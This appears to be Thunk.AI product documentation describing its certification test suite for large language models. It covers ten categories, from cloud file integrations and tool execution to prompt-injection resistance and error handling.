AI large language models (LLMs) are probabilistic by nature. Different models from different providers behave differently and the same model can behave inconsistently across contexts. A model that performs well in general conversation may fail to use tools correctly, follow structured instructions, or handle edge cases predictably in a business workflow.
To ensure that a given LLM can support the reliability requirements of the Thunk.AI platform, every model undergoes a structured certification process before it is made available for use.
What is LLM Certification?
LLM certification is a test suite that validates whether a model can correctly perform the full range of operations required by Thunk.AI workflows β from reading documents and executing tools, to resisting prompt injection and recovering gracefully from errors.
A model is certified for use on the platform when it passes the test suite with near-perfect accuracy.
Depending on the customer scenario, certain features may not be required. In those cases, the corresponding tests are omitted from the certification run.
The test suite continues to evolve as new platform features are introduced.
Test Categories
1. Cloud Storage & Document Integrations
Validates that the agent can create, read, update, and move files across Google Drive, Microsoft OneDrive, Google Sheets, Excel workbooks, and Google Docs. Covers folder creation, file uploads, moving and copying between folders, writing formulas and raw values to sheets, appending to documents, and handling invalid paths or hostnames gracefully.
2. Content Reading & URL Extraction
Tests the agent's ability to fetch and process content from a wide range of sources: public URLs, Google Drive and OneDrive links, email attachments, Thunk memory nodes, PDFs, HTML pages (including JavaScript-rendered content), and various file types including receipts, spreadsheets, and documents. Validates that content is correctly extracted and usable by the agent.
3. Security & Prompt Injection
Tests that the system resists prompt injection and data exfiltration. Output checker unit tests detect malicious HTML while allowing legitimate content. Direct injection tests verify the agent resists injection via row names, descriptions, and chained instructions. End-to-end integration tests run the full agent loop with injected content to ensure unsafe output is blocked before it reaches the user.
4. Workflow & Routing
Tests email and webhook routing logic: creating new rows from incoming messages, matching to existing rows, custom routing instructions, and adds-only vs. updates-only behavior. Also covers workflow planning from documents, images, spreadsheets, and task lists, as well as playbook execution for common scenarios such as product launches, records digitization, and support ticket processing.
5. Agent Loop & Tool Execution
Tests the core agent loop: tool availability and constraints, recovery from invalid tool calls, batching multiple tool calls, and tool call history. Covers ToolBuilder (adding and fixing tools), MCP server integration, and custom AI tools including composite tools, circular call prevention, and approval flows.
6. Step & Task Management
Tests step lifecycle and human-in-the-loop flows: assigning steps by name, email, or role; scheduled work; approval requests; conversation drafts and auto-responses; wait-for-conversation behavior; autocomplete; and assignee and owner visibility.
7. Data Operations & Lookups
Tests sheet and Excel lookups, CSV and XLSX imports, data collection from Drive images, updating AI and non-AI columns, doc collection search and folder-based population, and property binding visibility.
8. Intelligence & Suggestions
Tests the suggestion system that helps users configure workflows correctly: detecting contradictions, identifying missing input bindings (such as a ticket link or customer name the agent needs but hasn't been given), validating extracted data against expected outputs, and checking consistency between input properties and checker outputs.
9. Research & Web Search
Tests the agent's ability to use web search and external tools for research tasks across a range of domains. Also covers Google Maps integration, document collection queries, and link shortening across drive files, email attachments, and external artifacts.
10. Edge Cases & Reliability
Tests error handling and boundary conditions: file attachment size warnings, meaningful error messages for invalid Drive and OneDrive URLs, multi-block instruction handling, data context preservation across instruction blocks, timeout behavior, and browser concurrency limits.
